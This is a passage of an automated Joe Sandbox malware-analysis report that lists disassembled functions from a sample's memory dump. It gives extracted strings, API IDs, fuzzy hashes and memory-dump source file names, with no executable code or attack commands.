                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @A$lPLN$svfZ$IK
                              • API String ID: 0-1806543684
                              • Opcode ID: df672c68a26334545e16849cd9e363aa4f57f2bc903f677b33558ec8f31dad68
                              • Instruction ID: dfc800ca8de9153d3b1cb55365f93eb913111325a5944649362736cbb407c29d
                              • Opcode Fuzzy Hash: df672c68a26334545e16849cd9e363aa4f57f2bc903f677b33558ec8f31dad68
                              • Instruction Fuzzy Hash: 31C1067165C3898BD3258E64D4A137FFBE2ABC2740F18893CE5E94B385D7758C099B82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @J$KP$VD$ra1
                              • API String ID: 0-2326683248
                              • Opcode ID: f121014aa48cabe09586cd1f1925808b0d29be6f46397f968a54cba6175ffdc1
                              • Instruction ID: ad5f839dd45231358dca33cbd96359623ad07252099481cdd8f1b125db819750
                              • Opcode Fuzzy Hash: f121014aa48cabe09586cd1f1925808b0d29be6f46397f968a54cba6175ffdc1
                              • Instruction Fuzzy Hash: 6A9162B2704B05AFE725CF64C881BABBBB1FB86310F14452CE5959B781C374A816CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$)$IEND
                              • API String ID: 0-588110143
                              • Opcode ID: 60edb3fe63b0c0ad832856c63e70e71507179affa4fb213f84d8e23b2395846a
                              • Instruction ID: 5f65a001380c3dae552b3c9c68fe5a93b798304ed30f75cefbce5ea03206dece
                              • Opcode Fuzzy Hash: 60edb3fe63b0c0ad832856c63e70e71507179affa4fb213f84d8e23b2395846a
                              • Instruction Fuzzy Hash: 52F12471A147099BE314EF28D85172BFBE0BB94344F04463DFA959B391D7B4E924CB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PQ$A_$IG
                              • API String ID: 0-2179527320
                              • Opcode ID: 67fff2dfb85189e761182fd3373c8c006af1258e43200798a8d354bcc12828c0
                              • Instruction ID: b2dfd57f3a64690931b6615939e78212cba9d1e989ef0f0e2fbab81ef5f297c4
                              • Opcode Fuzzy Hash: 67fff2dfb85189e761182fd3373c8c006af1258e43200798a8d354bcc12828c0
                              • Instruction Fuzzy Hash: DA41CAB001C34A8AC704CF21D89267BF7F0FF92798F249A1DE1C58B295E7348546CB4A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: f$
                              • API String ID: 2994545307-508322865
                              • Opcode ID: 3e21b31f4d26d6bc6ec7a4020888825dee1d994122bed6a21428730184be1f42
                              • Instruction ID: 54efaee7c3afc9b4074e61107e3742aace06887e8fd151d3b2a46c30fcb42a69
                              • Opcode Fuzzy Hash: 3e21b31f4d26d6bc6ec7a4020888825dee1d994122bed6a21428730184be1f42
                              • Instruction Fuzzy Hash: F81215702183519FD716CF29E890A2FBBE5EFC9714F259A2CE59587292C730EC41CB92
                              Strings
                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00322591
                              • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 003225D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                              • API String ID: 0-2492670020
                              • Opcode ID: 64605ba2ccee3835b56bd4069fcc3a6928f66c549fe97023459c2a5379d5bcfb
                              • Instruction ID: 0cb11b68a47249e8592597a010bb213fd435414a99e4a2547f35e7fa09634173
                              • Opcode Fuzzy Hash: 64605ba2ccee3835b56bd4069fcc3a6928f66c549fe97023459c2a5379d5bcfb
                              • Instruction Fuzzy Hash: 73814B33A086A15BCB1A8E3CAC913ABBB965F97330F3DC3A9D8719B3D5C1658D058351
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: efg`$efg`
                              • API String ID: 0-3010568471
                              • Opcode ID: bd9225fb1788c6edeec95a0e5923aca8fa4cb5b9734b9876f763a4c182a7a3f9
                              • Instruction ID: ae131c6c686d51d759bb45480281432383740071f980d1ba56aba6e25bd4d371
                              • Opcode Fuzzy Hash: bd9225fb1788c6edeec95a0e5923aca8fa4cb5b9734b9876f763a4c182a7a3f9
                              • Instruction Fuzzy Hash: 1131E132A283558BC729DF50D59166FF392ABE4340F5A453CEA8627621CB709E0AC7D2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: wo{
                              • API String ID: 0-1599316095
                              • Opcode ID: 01c022777eebcce1256b02a3051b146b4303bc9a353b43c8b68717c5af2bf60e
                              • Instruction ID: 996673c28335215ceca2097f59950346691b90d7df23fe0e172912bcae19408f
                              • Opcode Fuzzy Hash: 01c022777eebcce1256b02a3051b146b4303bc9a353b43c8b68717c5af2bf60e
                              • Instruction Fuzzy Hash: CF7229F360C204AFE314AE2DEC8567AFBE9EF94720F16453DE6C4C3740EA7558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: st@
                              • API String ID: 0-3741395493
                              • Opcode ID: ab7ce971145202d144a2735b82165732fdca708fd9cad15a74d00240cf36f375
                              • Instruction ID: 03aebebf23b6b350a9e671ec42aa6e5667d13103387c8f050819ca67d43f7e2c
                              • Opcode Fuzzy Hash: ab7ce971145202d144a2735b82165732fdca708fd9cad15a74d00240cf36f375
                              • Instruction Fuzzy Hash: 56F148B150C381CFD3198F24D89036BBBE6AF99304F19887DE5C58B282D775D94ACB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: =:;8
                              • API String ID: 2994545307-508151936
                              • Opcode ID: cfe927e97853b7ca9d80c5ed561d278835c1bfea4f32f1149c24c556b67573e9
                              • Instruction ID: b2787bca073e5158b30e935cdac5a9fb9d75b27694da816b32ea7207f3618719
                              • Opcode Fuzzy Hash: cfe927e97853b7ca9d80c5ed561d278835c1bfea4f32f1149c24c556b67573e9
                              • Instruction Fuzzy Hash: DFD15BB2A583118BD719CB28CC822BBB796EFC9304F1A853DD9864B381DA749C46C795
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: efg`
                              • API String ID: 0-115929991
                              • Opcode ID: 4ef0c89d32e676d3e80e868b29bcff16a34ed33deb9dcca1e9f150b0c8c388cc
                              • Instruction ID: 2428c5b921c7a55b4923a1cd8e1d9bc17254a844763f9b6fae42a019e454a835
                              • Opcode Fuzzy Hash: 4ef0c89d32e676d3e80e868b29bcff16a34ed33deb9dcca1e9f150b0c8c388cc
                              • Instruction Fuzzy Hash: 37C11571D10215DFCB268F58DCA2BBB73B4FF46310F198169E942972D2E734A911CBA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: _^]\
                              • API String ID: 2994545307-3116432788
                              • Opcode ID: f00374d783c954c1fa869970935673f089bf0695b8c323b1ee3e84d17f01ad72
                              • Instruction ID: aef46ea323ca9a6f65fc23b7a96c8c7699ac9ba605bf16baf8812c169ddc5b2d
                              • Opcode Fuzzy Hash: f00374d783c954c1fa869970935673f089bf0695b8c323b1ee3e84d17f01ad72
                              • Instruction Fuzzy Hash: 1381CC756083418FC71ADF18D4A0A2AB7F2FF99710F06996CE9819B365E731EC51CB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,
                              • API String ID: 0-3772416878
                              • Opcode ID: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                              • Instruction ID: 9af18a0830aead61c3619e3e32828a5869bbff18a612caee8742d9fac438a4e1
                              • Opcode Fuzzy Hash: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                              • Instruction Fuzzy Hash: C9B148701083859FD321CF58C89462BFBE0AFA9704F484E2DE5D997742D671EA18CBA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: 5|iL
                              • API String ID: 2994545307-1880071150
                              • Opcode ID: 55b6efeb965092f89ec5947892a452c34157baf19093039220e0d34156a96f90
                              • Instruction ID: bbc8eef13c4816459985c849bbcfc4a2f0d72f2009b4621346d8a66e092422a2
                              • Opcode Fuzzy Hash: 55b6efeb965092f89ec5947892a452c34157baf19093039220e0d34156a96f90
                              • Instruction Fuzzy Hash: 1B711E32A043209FC7159F3CAC80657F7A6EBC5724F16866CE9949B265C371DC418BC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: $Q}R
                              • API String ID: 0-2090767505
                              • Opcode ID: 8de77d51d3814f4fa51fc39be4ce69c72897206b2c57664c7aeb6aee8d2a09de
                              • Instruction ID: bd85e1ba84a1987afb00495ca3a46ee02d1dd65e4e54a7f5fccb06cc520312f7
                              • Opcode Fuzzy Hash: 8de77d51d3814f4fa51fc39be4ce69c72897206b2c57664c7aeb6aee8d2a09de
                              • Instruction Fuzzy Hash: C97116F3E086149BE3006E2CDC8537ABBE5EB94320F1B4A3DDBD497780E93958058386
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
